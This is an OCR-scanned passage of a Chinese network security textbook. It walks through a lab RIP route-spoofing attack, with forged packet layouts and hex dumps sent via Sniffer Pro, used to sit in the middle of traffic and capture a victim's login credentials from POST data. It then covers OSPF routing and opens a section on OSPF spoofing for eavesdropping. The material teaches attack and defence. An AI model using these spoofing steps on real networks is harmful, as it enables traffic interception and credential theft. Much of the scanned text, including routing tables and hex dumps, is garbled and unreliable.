Network Deat atdon Netmask Gateway Interface Metric 
中 二 255. 255. 255. 0 50.1.1.4 50.1.1. 4 1 
255. 255. 255. 255 127.0.0.1 127.0.0.1 
50. 2557 255- 255 255. 255. 255. 255 50.1.1. 4 下风 1 
61.1.1.0 255. 255. 255. 0 50.1.1.20 -4 3 
70.1.1.0 255. 255. 255. 0 70.1.1.1 a | 
0.1.1.1 255.255.255.255 127.0.0.1 1 1 
70. 255. 255. 255 255. 255. 255. 255 70.1.1.1 1 
127.0.0.0 255. 0. 0.0 127.0.0.1 四 1 
2 0.0.0 224.0.0.0 50.1.1.4 :者 时 
4. 0. 0.0 224. 0. 0.0 70.1.1.1 =“ 1 
255. 2532 255. 255 255- 255. 255. 255 50.1.1.4 -4 1 


图 5-42 路 由 器 1 的 路 由 表 


第 四 步 : 在 Web 服务 器 上 安装 “中 网 景 论坛 "(步骤 略 )。 
第 五 步 : 在 攻击 者 主机 上 配置 两 条 “静态 路 由 ”。 
在 攻击 者 主机 上 添加 到 达 61.1.1.0 和 70.1.1.0 网 络 的 静态 路 由 ,将 发 往 61. 1.1.0 
网 络 的 数据 包 转 发 给 路 由 器 2, 将 发 往 70. 1. 1.0 网 络 的 数据 包 转 发 给 路 由 器 1。 这 两 条 
路 由 负责 中 转 两 个 网 络 的 数据 包 。 图 5-44 为 攻击 者 主机 的 路 由 表 , 可 见 两 条 新 增加 的 静 
140 


C:N>netstat 下 


Rout e Table 


Interface List 
人 了 S TCP Loopback interface 
-00 0c 29 a3 70 40 . AND PCNET Family Ethernet Adapter 


0x. 
0x3000003 


Active Routes 


Network Destination Netmask Gateway Interface ketric| 
1.0 255. 255. 255. 0 50.1.1.20 0, 1.1.20 1 

50.1.1.20 255.255.255.255 。 1 

50. 255. 255.255 255.255.255.255 1.20 1 
61 二 255. 255. 255. 0 = 1 

61 。 255. 255. 255. 255 -0.0.1 1 

61. 人 9 255 255. 255. 255. 255 61.1.1.1 1 
255. 255. 255. 0 50.1.1.4 3 

255. 0.0.0 127. 0. 0. 1 1 

2 和 证 pe: 0 50.1.1.20 1 

0.0 和 1 

255: 2587 2 255 50.1.1.20 1 


图 5-43 路 由 器 2 的 路 由 表 


态 路 由 。 


C:\Documents and Settings\Administrator netstat - 开 


Rout e . Table 


- HS TCP A Pbk interface 
hb Family Ethernet Adapter 


Network Destination Netmask Gateway Interface ketric 
0.0. .0.0 50.1.1.4 50.1.1.10 1 

55.0 50.1.1.10 50.1.1.10 1 

50.1.1.10 255.255.255.255 127.0.0.1 127. 0. 0. 1 

50. 2 2 255 255.255.255.255 50.1.1.10 50.1.1.10 1 
1.1.0 255. 255. 255. 0 50.1.1.20 50.1.1.10 1| 

127.0.0.0 255. 0.0.0 127. 0. 0. 1 let 0 0 1 
224.0.0.0 224. 0.0.0 50.1.1.10 50.1.1.10 1 

经 ; 255. 255. 255 255.255.255.255 50.1.1.10 50.1.1.10 1 


图 5-44 攻击 者 主机 添加 了 两 条 静态 路 由 


第 六 步 : 攻击 者 广播 两 个 RIP 路 由 欺骗 报 文 。 

攻击 者 发 送 第 一 个 RIP 路 由 欺骗 报 文 , 在 路 由 器 2 的 路 由 表 中 添加 一 条 到 达 70. 1. 
1.0 网 络 的 路 由 信息 ,其 下 一 条 地 址 为 攻击 者 主机 的 IP。 第 一 个 RIP 欺骗 报 文 如 图 5-4 
所 示 , 共 66 字 节 ,包括 14 字 节 链 路 层 数据 ,20 字 节 IP 首部 ,8 字 节 UDP 首部 ,24 字 
RIP 数据 。 

在 链 路 层 数 据 中 , 目的 MAC 地 址 为 广播 地 址 , 源 MAC 地 址 为 攻击 者 主机 MAC。 
在 IJP 首部 中 , 源 IP 地 址 为 攻击 者 主机 IP, 目 的 IP 地 址 为 广播 地 址 ,这 保证 50. 1.1.0 网 
络 内 的 两 台 路 由 器 都 会 收 到 这 个 RIP 应 答 报 文 , 如 果 某 台 路 由 器 采纳 这 个 RIP 报 文 携带 
的 路 由 信息 ,那么 对 应 路 由 的 下 一 跳 地 址 将 设置 为 攻击 者 主机 IP。 

在 RIP 层 数据 中 携带 了 一 条 到 达 70. 1. 1.0 网 络 的 路 由 信息 , 它 表示 经 过 攻击 者 主 
机 到 达 70.1.1.0 网 络 的 跳 数 为 1。 路 由 器 1 的 路 由 表 中 已 经 包含 到 达 70. 1. 1.0 网 络 的 
路 由 信息 ,其 跳 数 也 为 1, 因 此 路 由 器 1 不 采纳 RIP 欺骗 报 文 携 带 的 这 条 路 由 。 路 由 器 2 
中 也 包含 到 达 70. 1. 1.0 网 络 的 路 由 信息 ,但 其 跳 数 为 3, 因此 路 由 器 2 采纳 这 条 路 由 信 
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FFFFIPFIFFEFF 520 520 
hacker MAC length check 
个 20B 个 24B 
Link data IP header RIP data 
14B UL 8B 几 
0x45| 0 length 2 2 0 
id flag 2 0 
TILI 7 check 70.1.1.0 
hacker IP 255.255.255.0 
| 5011255 | 0.0.0.0 
Metric=1 


图 5-45 第 一 个 RIP 欺骗 报 文 


息 ,将 到 达 70.1.1.0 网 络 的 下 一 跳 地 址 改 为 攻击 者 主机 IP, 跳 数 改 为 2。 

攻击 者 发 送 第 二 个 RIP 路 由 欺骗 报 文 , 在 路 由 器 1 的 路 由 表 中 添加 一 条 到 达 61. 1. 
1.0 网 络 的 路 由 信息 ,其 下 一 条 地 址 为 攻击 者 主机 的 IP。 第 二 个 RIP 欺骗 报 文 如 图 5-46 
所 示 。 


FF.FF.FF.FFJPF.FF 520 520 
hacker MAC length check 


|ox45| 0 | length 2|2 0 
flag 0 
[17 | check 61.1.1.0 
hacker IP 255.255.255.0 
50.1.1.255 0.0.0.0 
Metric=1 


图 5-46 第 二 个 RIP 欺骗 报 文 


利用 Sniffer Pro 截获 两 台 路 由 器 之 间 正 常 传递 的 RIP 应 答 数 据 包 ,按照 图 5-46 经 
过 简单 修改 就 可 以 得 到 两 个 RIP 欺骗 报 文 (注意 : 构造 时 需要 重新 计算 IP 首部 和 UDP 
首部 校 验 和 ) ,如 图 5-47 和 图 5-48 所 示 。 使 用 Sniffer Pro 将 这 两 个 报 文 发 送出 去 。 

两 台 路 由 器 的 路 由 表 如 图 5-49、 图 5-50 所 示 。 可 见 通 过 路 由 器 1 到 达 61. 1. 1.0 网 
络 的 下 一 跳 地 址 为 攻击 者 主机 IP, 跳 数 为 2。 通 过 路 由 器 2 到 达 70. 1. 1.0 网 络 的 下 一 跳 
地 址 也 为 攻击 者 主机 IP, 跳 数 为 2。 这 样 一 来 ,发 往 61. 1.1.0 和 70. 1.1.0 网 络 的 通信 数 
据 都 将 发 给 攻击 者 主机 ,攻击 者 主机 再 通过 静态 路 由 实现 数据 的 中 转 。 至 此 ,攻击 者 成 为 
61.1.1.0 和 70.1.1.0 网 络 通信 的 “中 间 人 ”, 可 以 中 转 这 两 个 网 络 之 间 的 通信 数据 并 从 中 
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Send current frane 


Configuration | 


Send 


F Continuously 


Send Type 


| 全 Delayl! 


Millisecond| 


gm tinels || ¢ fl00™ % of netrork 


Packet 
Data 


0000: 
0010: 
0020: 
0030: 
0040: 


ft ff ft ft ff 00 Oc 29 
34 03 06 00 00 80 11 do 
ff 02 08 02 08 00 20 4c 
00 46 01 01 00 ££ ££ ££ 


ol 


a3 
a8 
8c 
00 


70 3b 08 00 45 00 
32 01 01 0a 32 01 
0z 02 00 00 00 02 
00 00 00 00 00 00 


Send current frame 


Confi guration | 


Send 


三 Continuously 


Send Type 


Delayl! 


Millisecond 


[gn timels | Oho % of network 


Packet 一 
Data 


0000: 
0010: 
0020: 
0030: 
0040: 


Size: |66 


££ ft 00 Oc 29 
00 00 80 11 do 
02 08 00 20 55 
DO1 00 ££ ££ ££ 


a3 
a8 
Be 
oo0 


70 3b 08 00 45 00 
32 01 01 0a 32 01 
02z 02 00 00 00 02 
oo 00 00 00 00 00 


图 5-48 第 二 个 RIP 欺骗 报 文 


C:\netstat —r 


Interface List 


Oxl ...... 
0x4000004 
0x5000003 


Active Routes: 


50.1. 


127. 0. 
224. 0. 
224. 0. 
255. 255. 255. 


Network Destination 


1.0 


-1.2 


Netmask 
255. 255. 255. 0 


50.1.1.4 255.255.255.255 
50. 255. 255. 255 255. 255. 255. 255 
61.1.1.0 


255. 255. 255. 0 
255. 255. 255. 255 
255. 255. 255. 0 
255. 255. 255. 255 
255. 255. 255. 255 
255.0.0.0 
224.0.0.0 
224.0.0.0 

255. 255. 255. 255 


HS TCP Loopback interface 
---。 AND PCNET Family Ethernet Adapter 
- AND PCNET Family Ethernet Adapter 


Interface 


etric 


1 
1 
1 


i 


提取 出 敏感 信息 。 
第 七 步 : 在 攻 


图 5-49 路 由 器 1 的 路 由 表 


者 主机 使 用 Sniffer Pro 捕获 受害 者 的 账户 信息 。 
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C:N>netstat 下 


Rout e Table 


ve HS TCP Loopback interface 
0x3000003 ...00 0c 29 a3 70 40 AND PCNET Family Ethernet Adapter 
0x3000004 ...00 0c 29 a3 70 45 - AED PCNET Family Ethernet Adapter 


Ac 2 
Network Destination Netmask Gateway Interface Netric 
50.1.1.0 255. 255. 255.0 0 1 
50.1.1.20 255.255.255.255 
50. 255. 255. 255 255.255. 255. 255 
61.1.1.0 255. 255. 255.0 
61.1.1.1 255- 255. 255. 255 
61. 255. 255. 255 255.255.255.255 
70.1.1. 255. 255. 255. 0 
255.0.0.0 
224.0.0.0 
224. 0.0.0 
_255. 255. 255. 255 


图 5-50 路 由 器 2 的 路 由 表 


受害 者 访问 Web 服务 器 , 它 发 出 的 数据 包 经 过 攻击 者 主机 中 转 , 登录 信息 也 包含 在 
内 。 攻 击 者 使 用 Sniffer Pro 捕获 中 转 数据 包 。 因 为 虚拟 机 采用 host-only 方式 连接 , 因 


此 可 以 捕获 全 网 内 传递 的 所 有 报 文 。 


因为 账户 信息 通常 以 POST 方式 提交 ,因此 可 以 在 捕获 的 数据 包 中 搜索 “POST” 关 
键 词 。 方 法 是 右 击 第 一 个 数据 包 .选择 Find Frame, 在 Search 文本 框 内 输入 “POST”、 选 


中 Data ASCII, 指定 Match case, 选 中 Down, 单 击 “ 确 定 ” 按 钮 。 设 置 界面 如 图 5-51 
所 示 。 


Find Frame 


Text |Tine | Data | status | Expert| 

Search 

Eos7] 时 
Search Sunmary tex (5 Data ASCI 

eS CDetail te = Data Hex 

Match case 

Search Ch om 


图 5-51 Find Frame 设置 界面 


由 于 采用 了 host-only 网 络 环境 ,因此 在 捕获 数据 包 中 可 以 发 现 4 个 POST 报 文 ,如 
图 5-52 所 示 。 通 过 分 析 源 .目的 MAC 地 址 可 以 得 知 这 4 个 报 文 依次 是 受害 者 发 给 路 由 


器 2、 路 由 器 2 转发 给 攻击 者 、\ 攻 击 者 转发 给 路 由 器 1. 路 由 器 1 转发 给 Web 服务 器 。 


如 果 使 用 交换 式 网 络 环境 ,攻击 者 只 能 捕获 两 个 POST 报 文 , 即 路 由 器 2 转发 给 攻 
击 者 和 攻击 者 转发 给 路 由 器 1 的 报 文 。 从 POST 报 文 的 content 数据 部 分 可 以 提取 出 账 


户 信息 ,如 图 5-53 所 示 。 可 见 用 户 名 为 jack、 密 码 为 86982480 。 
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EE Te TI-2] T70-TT 3] HTTE7T 1-76 bytes of content 
hs |[e1.1.1.2] [70.1.1.2] 
HTTP/1.1-76 by f 
|20 |[61.1.1.2] [70.1.1.2] 
HTTP/1 .1-76 by f -< 
1 lre1.1.1.2] [70.1.1.2] HTTP/1 1-76 b f 


图 5-53 捕获 的 账户 信息 


510  RIP 的 优 缺 点 


RIP 的 优点 是 实现 简单 .开销 小 。 但 RIP 的 缺点 也 比较 多 。 首 先 ,RIP 的 最 大 距离 是 
15, 这 限制 了 网 络 规模 。 其 次 ,路 由 器 之 间 交 换 的 信息 是 完整 的 路 由 表 , 当 网 络 规模 较 大 
时 ,通信 量 也 较 大 。 最 后 , 当 网 络 出 现 故 障 时 ,要 经 过 较 长 时 间 此 信息 才能 传递 到 所 有 路 
由 器 。 然 而 目前 在 规模 较 小 的 网 络 中 ,使 用 RIP 的 仍 占 多 数 。 


启 
此 
立 


. 路 由 器 的 作用 是 什么 ? 

. 你 能 设计 出 哪些 方案 来 增强 RIP 的 安全 性 ? 

. RIP 欺骗 和 ARP 欺骗 在 攻击 范围 上 有 哪些 区 别 ? 
.如 何 发 现 网 络 内 的 RIP 欺骗 攻击 者 ? 


> 0 ”~ 
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第 6 意 
“OSPF 协议 及 其 安全 问题 


6.1 ”开放 式 最 短路 径 优先 


开放 式 最 短路 径 优 先 (Open Shortest Path First, OSPF) 协 议 是 IETF (Internet 
Engineering Task Force) 于 1988 年 提出 的 ,是 一 个 基于 链 路 状态 的 动态 路 由 协议 。 它 产 
生 于 IP 网 络 , 用 于 在 自治 系统 内 部 进行 路 由 选择 。 

6.1.1 Dijkstra 算法 

OSPF 协议 是 一 种 典型 的 数据 链 路 状态 路 由 协议 ,路 由 表 的 形成 过 程 可 以 简单 描述 
如 下 : 首先 ,在 自治 系统 内 部 的 相 临 路 由 器 彼此 交换 各 自 掌 握 的 数据 链 路 信息 ,并 将 这 些 
信息 存 人 各 自 的 链 路 状态 数据 库 ,最终 自 治 系统 内 部 的 每 台 路 由 器 都 会 具有 相同 的 链 路 
状态 数据 库 。 接 下 来 ,路 由 器 针对 链 路 状态 数据 库 应 用 Dijkstra 算法 计算 出 一 个 SPF 
(Shortest Path First) 树 。 最 后 从 这 个 SPF 树 中 提取 出 最 佳 路 径 ,形成 自己 的 路 由 表 。 

Dijkstra 算法 描述 如 下 : 

(1) 从 本 地 结 点 (路 由 器 ) 开 始 : 本 地 结 点 就 是 树 根 。 

(2) 把 代价 0 指派 给 这 个 结 点 ,并 使 它 成 为 第 一 个 永久 结 点 。 

(3) 对 最 新 的 永久 结 点 的 每 一 个 相 邻 结 点 进行 检查 。 给 每 一 个 结 点 指派 一 个 累计 代 
价 , 并 使 它 成 为 临时 的 (注意 : 不 对 已 经 是 永久 结 点 的 相 邻 结 点 进行 检查 ) 。 

(4) 在 临时 结 点 的 清单 中 : 四 寻找 具有 最 小 累计 代价 的 结 点 ,并 使 它 成 为 永久 的 ; 
@ 车 一 个 结 点 从 多 于 一 个 方向 可 达 , 选 择 具有 最 小 累计 代价 的 方向 。 

(5) 重复 步 又 (3) 和 (4) ,直到 每 一 个 结 点 成 为 永久 的 。 

下 面 举例 说 明 OSPF 路 由 表 的 形成 过 程 ,网 络 拓扑 结构 如 图 6-1 所 示 ,4 个 网 
络 (NET1、NET2、NET3、NET4) 通 过 三 台 路 由 器 (R1、R2、R3) 连 接 在 一 起 。 网 络 中 存在 


图 6-1 网 络 拓扑 


ma 第 6 章 OSPF 协议 及 其 安全 问题 mem 


7 条 数据 链 路 ,每 条 链 路 旁边 的 数字 代表 该 链 路 的 度量 值 ,例如 R2 到 NET3 的 链 路 代价 
为 2。 

这 个 自治 系统 内 部 的 三 台 路 由 器 将 各 自 掌 握 的 数据 链 路 信息 (R1 两 条 、R2 两 条 、R3 
三 条 ) 彼 此 交换 ,最 终 三 台 路 由 器 都 会 掌握 网 络 的 全 部 数据 链 


路 信息 ,它们 会 拥有 共同 的 链 路 状态 数据 库 ,其 中 保存 了 7 条 1 
链 路 数据 ,这 个 链 路 状态 数据 库 如 图 6-2 所 示 。 以 第 一 条 记录 Rs 
为 例 , 它 表示 从 R1 到 NET1 的 代价 是 1( 注 意 : 只 有 路 由 器 到 二 | 
网 络 的 方向 计算 代价 ,反方 向 不 计算 )。 R3 N41 


每 台 路 由 器 都 掌握 如 图 6-2 所 示 的 链 路 状态 数据 库 , 即 每 ”图 6-2 链 路 状态 数据 库 
台 路 由 器 都 掌握 网 络 的 拓扑 结构 。 接 下 来 路 由 器 要 根据 这 个 
链 路 状态 数据 库 应 用 Dijkstra 算法 计算 出 自己 的 SPF 树 , 从 而 得 到 自己 的 路 由 表 , 三 台 
路 由 表 的 计算 过 程 如 图 6-3 一 图 6-5 所 示 ,以 R1 为 例 进行 说 明 。 


和 单一 


1 
Ey Ey 
RI NI 1 (d) 为 R2 加 上 相 邻 结 点 
Rl ND (a) 从 RI 开始 
R2 N2 1 ~ 
R2 N3 2 
R3 N2 4 1 1 ! 
R3 N3 1 | 2 
R3 N4 1 Ri|— -CN2) R1 N2 R3 
链 路 状态 数据 库 (b) 为 R1 加 上 相 邻 结 点 (e) 为 R3 加 上 相 邻 结 点 
[Ra2 | NI 1 一 
1 1 N2 1 一 
| , N3 2 R3 
一 -GD 一 J 
(0) 为 N2 加 上 相 邻 结 点 (D 得 到 R1 的 路 由 表 


图 6-3 Rl 路 由 表 的 计算 过 程 


第 一 步 : 从 本 地 路 由 器 R1 开始 计算 ,Rl 就 是 树 根 。 第 二 步 为 R1 增加 两 个 相 邻 结 
点 Nl1 和 N2。 第 三 步 : N1 没有 其 他 相 邻 结 点 ,将 其 标记 为 永久 结 点 。 增 加 N2 的 相 邻 结 
点 R2 和 R3( 注 意 : 网 络 到 路 由 器 方向 不 计算 代价 )。 第 四 步 增加 R2 的 相 邻 结 点 N3, 累 
计 代价 为 3。 第 五 步 : 增加 R3 的 相 邻 结 点 ,由 于 从 R3 到 N3 的 累计 代价 为 2, 小 于 R2 到 
N3 的 累计 代价 3, 因 此 删除 R2 到 N3 的 链 路 。 最 后 得 到 R1 的 路 由 表 。 


6.12 使 用 OSPF 协 议 组 建 网 络 
为 了 进一步 验证 OSPF 协议 路 由 表 的 计算 方法 ,按照 如 图 6-1 所 示 网 络 拓扑 搭建 一 
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R1 
R1 
R2 
R2 
R3 
R3 
R3 


NI1 
N2 
N2 
N3 
N2 
N3 
N4 


一 一 上 口 一 一 一 


链 路 状态 数据 库 


R1 
R1 
R2 
R2 
R3 
R3 
R3 


NI1 
N2 
N2 
N3 
N2 
N3 
N4 


一 一 天- 一 


链 路 状态 数据 库 


-一 他 


R2 
R2 1 
(a) 从 R2 开 始 (b) 为 R2 加 上 相 邻 结 点 
2 — 2 
R2 N3 NI1 R2 N3 
2 

1 1 1 1 
[RG || 本 |- (一 ~ 总 

(c) 为 N2 加 上 相 邻 结 点 (d) 为 R1 加 上 相 邻 结 点 


(e) 为 R3 加 上 相 邻 结 点 


图 6-4 R2 路 由 表 的 计算 过 程 


(a) 从 R3 开 始 


2 
1 
N3 2 
2 


(f) 得 到 R2 的 路 


(b) 为 R3 加 上 相 邻 结 点 


N2 R3 N4 G2 -x fi -CN 
(d) 为 R2 加 上 相 邻 结 点 
R1 
(e) 为 N2 加 上 相 邻 结 点 
1 CE 
B82 N1 3 R2 
- 1 N2 2 R2 
2 NS 1 -一 
RI1 -Ne) N4 1 一 
(f) 为 R1 加 上 相 邻 结 点 (g) 得 到 R3 的 路 由 表 


图 6-5 R3 路 由 表 的 计算 过 程 
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个 实际 的 网 络 环境 ,网 络 地 址 和 路 由 器 的 接口 IP 地 址 分 配 情况 如 图 6-6 所 示 。 


图 6-6 ”实验 环境 


本 实验 环境 采用 具有 多 网 卡 的 Windows 2000 虚拟 机 模拟 路 由 器 组 建 ,具体 步 又 
如 下 。 

第 一 步 : 配置 各 个 对 象 的 地 址 信息 。 

以 host-only 方式 启动 三 台 Windows 2000 虚拟 机 ,分别 代表 R1、R2、R3 ,参照 图 6-6 
配置 各 个 对 象 的 IP 地址 。 注 意 : 本 机 扮演 接 入 80.1.1.0 网 络 的 一 台 主 机 ,用 于 测试 ,IP 
地 址 为 80. 1. 1.2, 网 关 设置 为 80.1.1.1。 每 台 路 由 器 的 地 址 信息 如 图 6-7 一 图 6-9 所 示 。 


ernet adapter 
Description . . . - . . . : AMD PCNET Family PCI Ethernet hdapter #2| 
Physical Address. . . . . : 88-8C-29-C3-5D-ED 
DHCP Enabled. - - - - - - : 
IP hddress- - - - - - - - : 69.1.1.1 
Subnet Mask - - - - - - - : 255.255-255.9 
thernet adapter 本 地 连接 : 
Description . . . - 。 . - : AMD PCNET Family PCI Ethernet hdapter 
Physical Address. . . - - : 88-8C-29-C3-5D-E3 
DHCP Enabled. - - - - - - : 


thernet adapter 


Description : AMD PCNET Family PCI Ethernet hdapter #2| 
Physical hddress : 80-8C-29-A3-78-45 
DHCP Enabled 日 


thernet adapter 本 地 连接 : 


Description . - - - . - - : AMD PCNET Family PCI Ethernet hdapter 
Physical hddress- . . - - : 99-6C-29-h3-79-48 

DHCP Enabled. - - - - - - : No 

IP Address. . 。- - 。。- : 69.1.1.2 


图 6-8 了 R2 的 地 址 信息 


第 二 步 : 为 三 台 路 由 器 开启 OSPF 路 由 功能 ,实验 网 络 间 的 通信 。 

本 次 实验 使 用 了 4 个 网 络 ,为 了 实现 网 络 间 的 连通 ,需要 在 三 台 路 由 器 上 开启 路 由 功 
能 ,这 里 选择 OSPF 协议 实现 网 络 连通 。 以 R1 为 例 介绍 OSPF 路 由 的 开通 方法 : 在 路 由 
与 远程 访问 界面 右 击 IP 路 由 选择 下 面 的 “常规 ”一 选择 新 路 由 选择 协议 一 选中 “开放 式 最 
短路 径 优先 (OSPF) ”一 右 击 OSPF 习 选择 “新 接口 ”一 选中 “本 地 连接 ”一 输入 开销 为 1 
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FEnernet adapter 本 邢 备 和 接 3: 


Description 
Physical Address 
DHCP Enabled 
IP Address 


Ethernet adapter 本 地 连接 2: 


Description 
Physical Address 
DHCP Enabled 


Ethernet adapter 本 地 连接 : 


Description 
Physical Address 
DHCP Enabled 


AMD PCNET Family PCI Ethernet hdapter #3 
BC-29-66-87-61 


No 
88-1.1.1 
255.255.255.8 


: AMD PCNET Family PCI Ethernet hdapter #2 
88-8C-29-66-87-57 

No 

78.1-1-2 

: 255.255.255.8 


: AMD PCNET Family PCI Ethernet hdapter 
-8C-29-66-87-4D 


No 
68.1.1.3 
255.255.255.8 


图 6-9 


单 击 “ 确 定 ” 按 钮 。 再 按照 同样 的 步骤 添 力 
开通 OSPF 路 由 之 后 ,在 三 台 路 由 咒 
图 6-12。 可 以 发 现 三 个 路 由 表 与 


255. 255. 255.0 
255. 255. 255.0 
255. 255. 255. 255 
255. 255. 255. 255 
255. 255.255.0 
255. 255. 255.0 
255. 255. 255. 255 
255. 255. 255. 255 
255. 255. 255.0 
255. 255. 255.0 
255.0.0.0 

255. 255. 255. 255 
240.0.0.0 
240.0.0.0 

255 255 255 255 


图 6-10 


CCPC-CMKS8910BU - IIP 路 由 表 


255. 255. 255.0 
255. 255. 255.0 
255. 255. 255.0 
255. 255. 255. 255 
255. 255. 255. 255 
255. 255. 255.0 
255. 255. 255.0 
255. 255. 255. 255 
255. 255. 255. 255 
255. 255. 255.0 


m=--- 较 


& 

i 

1 
.2 
这 


5. 255 


255. 255. 255. 255 5. 255 


图 6-11 


第 三 步 
器 在 NET1 的 接口 IP 地 址 ) 。 
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: 验证 数据 报 的 传输 路 径 ,在 本 机 执行 dos 命 
i 二 计 二 全 SEE 机 大 汪汪 


R3 的 地 址 信息 


[本 地 连接 2。 
上 可 以 查看 到 4 个 网 络 的 路 由 信息 , 见 图 6-10 一 


之 前 的 计算 结果 一 致 。 


R2 的 路 由 表 


: ping 50. 1.1.1( 即 Rl 路 由 


CCPC- IP 足 由 表 


ce222o-ooRooonwoclo 
S55258-°°8"°° 
吕 轴 


四 
加 
只 
加 
量 昌 
mm 
加 器 


255. 255. 255. 255 


SSSa 人 nds 


EEEEEER 


图 6-12 


R3 的 路 由 表 


由 器 的 路 由 表 可 以 得 知 ,本 机 发 出 的 数据 报 将 沿 着 本 机 一 R3 一 R2 一 R1 的 路 径 传递 ,这 个 
IP 数据 报 在 传递 过 程 中 源 和 目的 MAC 地 址 在 不 断 变化 , 源 和 目的 IP 地 址 没有 变化 ,每 
经 过 一 台 路 由 器 ,数据 报 的 TTL 值 减 1,IP 首部 校 验 和 重新 计算 。 如 图 6-13 一 图 6-15 为 
在 本 机 运行 Sniffer Pro 捕获 本 机 发 出 的 IP 数据 报 , 验 证 报 文 的 传输 路 径 。 


RS3 在 NET4 的 捷 口 MAC 木 机 的 MAC 地 址 
00000000 : 08 00 45 00 Es a.PVv?. E 
00000010: 00 3c 07 10 路 00 80 01 af ac 50 01 01 02 32 01 . 1 Pi 2 
00000020: 01 01 08 00 44 Sc 02|00 07|00 61 62|63 64 65 66 -DA abcdef 
00000030: 67|68 69 6a 6b 6c 6d|6e 6f|70 71 72|173 74 75 76 ghijklmopqrstuvl| 
00000040: ?77|61 62 63 64 65 66|67 68|69 Wabcdef ghi 
50.1.1.1 TTL=128 ” 校 验 和 80. 1.1.2 
图 6-13 本 机 发 给 R3 的 IP 数据 报 
R2 下 NET3 的 接口 MAC R3 在 NET3 的 接 GMAC 
0000000; 00 Oc 29|a3 70 45 00 0c 29|66 07 57 08 00 45 00 ..) E..)f.V..E 
0000010: 00 3c 07 10 00 00 7£ 01 人 
0000020: 01 01 08 00 44 Sc 02|00 07|00 61 62|63 64 65 66 DN abcdef 
0000030: 67|68 69 6a 6b 6c bd|be 6f|70 71 72173 74 75 76 ghijklmnopqrstuy| 
0000040: ?7|61 62 63 64 65 66|67 68|69 wabcdef ghi 
50.1.1.1 TTL=127 _ 校 验 和 80.1.1.2 
图 6-14 ”R3 转发 给 R2 的 IP 数据 报 
R1 在 NET2 的 接口 MAC R2 在 NET2 的 接口 MAC 
00000000: 00_0c 29|c3 sd ed 00 0c 29|a3 70 40 08 00 45 00 ..) 肌 ?.) @..E 
00000010: 00 3c 07 10 00 00 ?e 01 bl ac 50 01 01 02 32 01 .< ~. 爆 P 人 
00000020: 01 01 08 00 44 Sc 02|00 07|00 61 62|63 64 65 66 ....D\,...abcdef 
00000030: 67|68 69 6a 6b 6c 6d|l6e 6£|70 ?1 72|73 74 75 76 ghijklmopqrstuv| 
00000040: 77|61 62 63 64 65 66|67 68|69 wabcdef ghi 
50.1.1.1 TTL=126 校 验 和 80-1.1.2 
图 6-15 ”R2 转发 给 R1 的 IP 数据 报 
RS 在 NETZ WAC 
0000000: 00 0c 29|66 07 4d 00 0c 29|c3 Sd ed 08 00 45 00 ..)f.M..) 肤 ?. E. 
0000010: 00 3c 19 1f 00 00 80 01 9d 54 32 01 01 01 50 01 .<....¢ 了 让 
0000020: 01 02 00 00 4c Sc 02|00 07|00 61 62|63 64 65 66 LV abcdef 
0000030: 67|68 69 6a 6b 6c 6dl6e 6f|70 71 72|73 74 75 76 ghijklmopqrstuv 
0000040: 77|61 62 63 64 65 66|67 68169 wabcdefghi 
80. 1.1.2 TTL=128 核验 和 50.11.1 


图 6-16 Rl 发 给 R3 的 全 数据 报 
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本 机 的 MAC 地 二 R3 在 NET4 接 口 的 MAC 


00000000: 00 50 56|c0 00 01 00 0c 29|66 07 61 08 00 45 00 .PY?...)f.a..E 
00000010: 00 3c 19 1f 00 00 7f 01 9e 9d 32 01 01 01 50 01 .< a 
00000020: 01 02 00 00 4c Sc 02|00 07|00 61 62|63 64 65 66 ....I\....abcdef 
00000030: 67|68 69 6a 6b 6c 6dl6e 6f£ 170 71 72|73 74 75 76 ghijklnnopqrstuvl 
00000040: 77|61 62 63 64 65 66167 68169 wabcdef ghi 
80.1.1.2 TTL=127 ” 校 验 和 50-1.1.1 


图 6-17 R3 转发 给 本 机 的 IP 数据 报 


通过 分 析 各 台 路 由 器 的 路 由 表 可 以 得 知 R1 返回 给 本 机 的 IP 数据 报 将 沿 着 R1 一 R3 
一 本 机 的 路 径 传递 。 图 6-16 一 图 6-17 为 R1 返回 给 本 机 的 IP 数据 报 。 


“B23 基于 OSPF 路 由 欺骗 的 网 络 监听 


网 络 监听 是 指 攻 击 者 在 自己 的 主机 上 运行 监听 软件 ,捕获 、 分 析 网 络 中 其 他 主机 之 间 
的 通信 数据 ,进而 从 中 提取 出 账户 、 密 码 等 敏感 信息 。 目 前 在 交换 式 局 域 网 中 通常 是 利用 
ARP 欺骗 或 ICMP 重 定向 实施 监听 。 但 这 两 种 方法 只 能 监听 网 络 内 部 主机 的 通信 数据 ， 
不 能 监听 外 部 网 络 之 间 的 通信 。 通 过 对 路 由 器 实施 路 由 欺骗 可 以 成 功 监听 外 部 网 络 之 间 
的 通信 数据 ,下 面 对 这 种 攻击 技术 进行 详细 讲解 。 

OSPF 协议 作为 园区 网 络 中 较为 常见 的 路 由 协议 被 广泛 应 用 ,本 节 重 点 研究 通过 发 
布 伪造 的 状态 通告 报 文 来 对 OSPF 路 由 器 实施 路 由 欺骗 攻击 ,进而 达到 网 络 监 听 的 攻击 
目的 。 


621 OSPF 路 由 欺骗 研究 环境 


这 里 在 如 图 6-18 所 示 的 网 络 环境 下 研究 OSPF 路 由 欺骗 技术 ,测试 环境 中 的 三 个 子 
网 netl、net2 .net3 通过 两 台 路 由 器 连接 在 一 起 。 攻 击 者 通过 OSPF 路 由 欺骗 监听 netl 和 


victim 
61.1.1.2 
本 机 00-50-56-c0-00-01 
net1:70.1.1.0 net3:60.1.1.0 

Dll 61.1.1.1 

00-0c-29-c3-5d-ed 00-0c-29-A3-70-45 
Routerl Router2 

50.1.1.4 50.1.1.1 

00-0c-29-c3-5d-e3 00-0c-29-A3-70-40 
net2:50.1.1.0 


pe 4 50.1.1.10 
Bose 00-0c-29-A3-70-3B 


图 6-18 网 络 环境 
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net3 网 络 间 的 通信 。 

为 了 便于 研究 将 如 图 6-18 所 示 的 网 络 环境 抽象 为 如 图 6-19 所 示 的 拓扑 结构 ,每 台 
路 由 器 和 每 个 网 络 都 抽象 为 一 个 结 点 , 链 路 旁边 的 数字 代表 了 这 条 链 路 的 代价 。 只 有 路 
由 器 到 网 络 方向 计算 代价 ,反方 向 不 计算 ,这 里 指定 每 条 链 路 的 代价 为 2 。 


RI1 的 路 由 表 R2 的 路 由 表 
Nl 2 一 Nl 4 RI 
N22 N2 2 一 
N3 4 R2 N3 2 = 


routerl router2 


hacker 


图 6-19 抽象 的 网 络 拓扑 结构 


